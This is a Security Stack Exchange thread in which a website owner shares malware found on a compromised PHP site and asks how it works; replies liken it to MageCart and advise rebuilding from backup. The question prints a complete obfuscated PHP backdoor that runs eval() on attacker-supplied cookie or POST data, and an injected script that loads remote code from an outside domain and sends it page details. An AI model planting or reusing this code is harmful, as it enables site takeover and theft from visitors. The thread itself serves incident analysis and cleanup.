0

We were recently infected with a PHP hack and was hoping you guys could shed some more light on the subject. Mainly how this hack works and how to fix it?

We are moving to a new setup, which according to our host, is the best way to remedy this. However, if we can slow down or stop the hacks during the move, it would be much better.

The hackers are injecting legitimate files into the headers as well as creating new PHP files, which in most cases contain these different lines of code, which make the searches to find them a bit easier.

$GLOBALS[$GLOBALS['

$payload = "file_put_contents

"base" . "64_decode"

Array('1'=>

= isset($

if (!defined('ALREADY_RUN

**The majority contain this code:**
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['s9b2'] = "\x76\x4f\x69\x63\x49\x6a\x66\x7c\x6c\x51\x3c\x4b\x2d\x20\x31\x29\x7b\x2c\x28\x46\x62\x52\x57\x42\x65\x45\x41\x59\x6f\x68\xa\x43\x9\x21\x3a\x61\x36\x77\x34\x7e\x7a\x5c\x2a\x3e\x71\x58\x6e\x32\x73\x27\x6b\x67\x5d\x78\x72\x44\x4a\x2e\x40\x5b\x37\x25\x38\x26\x5a\x50\x60\x3d\x3b\x56\x30\x4e\x3f\x70\x39\xd\x33\x53\x23\x2f\x22\x2b\x64\x79\x6d\x4d\x55\x7d\x5f\x75\x48\x54\x4c\x47\x35\x74\x5e\x24";
$GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][54];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]] = $GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][82];
$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][2].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][73].$GLOBALS['s9b2'][29].$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46];
$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]] = $GLOBALS['s9b2'][89].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][40].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]] = $GLOBALS['s9b2'][20].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][24];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][95];
$GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]] = $GLOBALS['s9b2'][95].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][20];
$GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]] = $GLOBALS['s9b2'][44].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][3];
$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] = $_POST;
$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] = $_COOKIE;
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51], NULL);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][8].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][51].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][48], 0);
@$GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][70]]($GLOBALS['s9b2'][84].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][53].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][89].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][28].$GLOBALS['s9b2'][46].$GLOBALS['s9b2'][88].$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][24], 0);
@$GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][70]](0);

$qcecc0e0f = NULL;
$ide605a9 = NULL;

$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][82]] = $GLOBALS['s9b2'][3].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][24];
global $s5cf5021d;

function qe9001c0c($qcecc0e0f, $v42282)
{
    $sbec70da = "";

    for ($s11c3d0e5=0; $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f);)
    {
        for ($k310c1a=0; $k310c1a<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($v42282) && $s11c3d0e5<$GLOBALS[$GLOBALS['s9b2'][73].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][3]]($qcecc0e0f); $k310c1a++, $s11c3d0e5++)
        {
            $sbec70da .= $GLOBALS[$GLOBALS['s9b2'][0].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][20]]($GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($qcecc0e0f[$s11c3d0e5]) ^ $GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][94]]($v42282[$k310c1a]));
        }
    }

    return $sbec70da;
}

function t1db($qcecc0e0f, $v42282)
{
    global $s5cf5021d;

    return $GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($GLOBALS[$GLOBALS['s9b2'][2].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][3].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][62].$GLOBALS['s9b2'][70]]($qcecc0e0f, $s5cf5021d), $v42282);
}

foreach ($GLOBALS[$GLOBALS['s9b2'][54].$GLOBALS['s9b2'][94].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][20].$GLOBALS['s9b2'][36]] as $v42282=>$r26d29)
{
    $qcecc0e0f = $r26d29;
    $ide605a9 = $v42282;
}

if (!$qcecc0e0f)
{
    foreach ($GLOBALS[$GLOBALS['s9b2'][95].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][6]] as $v42282=>$r26d29)
    {
        $qcecc0e0f = $r26d29;
        $ide605a9 = $v42282;
    }
}

$qcecc0e0f = @$GLOBALS[$GLOBALS['s9b2'][84].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][36].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][38].$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][35]]($GLOBALS[$GLOBALS['s9b2'][83].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14]]($GLOBALS[$GLOBALS['s9b2'][6].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][60].$GLOBALS['s9b2'][76]]($qcecc0e0f), $ide605a9));
if (isset($qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]]) && $s5cf5021d==$qcecc0e0f[$GLOBALS['s9b2'][35].$GLOBALS['s9b2'][50]])
{
    if ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][2])
    {
        $s11c3d0e5 = Array(
            $GLOBALS['s9b2'][73].$GLOBALS['s9b2'][0] => @$GLOBALS[$GLOBALS['s9b2'][8].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][14].$GLOBALS['s9b2'][70]](),
            $GLOBALS['s9b2'][48].$GLOBALS['s9b2'][0] => $GLOBALS['s9b2'][14].$GLOBALS['s9b2'][57].$GLOBALS['s9b2'][70].$GLOBALS['s9b2'][12].$GLOBALS['s9b2'][14],
        );
        echo @$GLOBALS[$GLOBALS['s9b2'][48].$GLOBALS['s9b2'][74].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][24].$GLOBALS['s9b2'][82].$GLOBALS['s9b2'][76].$GLOBALS['s9b2'][47].$GLOBALS['s9b2'][35]]($s11c3d0e5);
    }
    elseif ($qcecc0e0f[$GLOBALS['s9b2'][35]] == $GLOBALS['s9b2'][24])
    {
        eval($qcecc0e0f[$GLOBALS['s9b2'][82]]);
    }
    exit();
}

New infected header sample:

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://solventoffertes.be/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(do

There are around 4 different variations but the GLOBALS one is the most common.

Any insight as to how to fix this and how this works?

Anders
  • 65,052
  • 24
  • 180
  • 218
Rico
  • 11
  • 1
  • We are not going to be able to determine how it was done from the code they injected. We would have to know a LOT more about your setup. And unfortunately, we cannot perform a code analysis on random obfuscated code. – schroeder Dec 15 '16 at 07:51

1 Answers1

0

This seems to be similar to the MageCart hack. Look at examples here: https://github.com/gwillem/magento-malware-scanner/tree/master/malware

What they're essentially doing is stealing information from your site's users. The fact they're writing new files to your OS is concerning. You need to work with a security professional to get your site cleaned up. This requires changing all previous passwords, finding and removing all the malicious code,finding out how the attackers got in the first place, etc... If you are more technical you could find some security best practices for the application you have installed on your system and to look at the link Anders gave you in the comment for some more general information.

Zatara7
  • 111
  • 2
  • "finding and removing all the malicious code": It is better to just nuke from orbit. Trying to surgically removing the malware is risky - you never know if you did it right, until it is to late. – Anders Dec 15 '16 at 00:23
  • @Anders would companies actually do that? It's the right thing to do but it seems like it would be significantly more costly than cleaning up. – Zatara7 Dec 15 '16 at 22:21
  • Not sure I understand what you mean with comapies. But reformatting and restoring from backup is the standard approach, and in most situations the only solution. – Anders Dec 15 '16 at 22:23
  • [See this.](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – Anders Dec 15 '16 at 22:26
  • Makes sense to use the backup for filesystem but for database it's kind of hard. Let's say that you've been compromised for 8 months or so, do you just go back to the way your database was back then? – Zatara7 Dec 15 '16 at 22:38
  • No, probably not, but a database is less likely to be "infected". My point is that going through the code and trying to remove the bad parts is the wrong approach. – Anders Dec 15 '16 at 22:56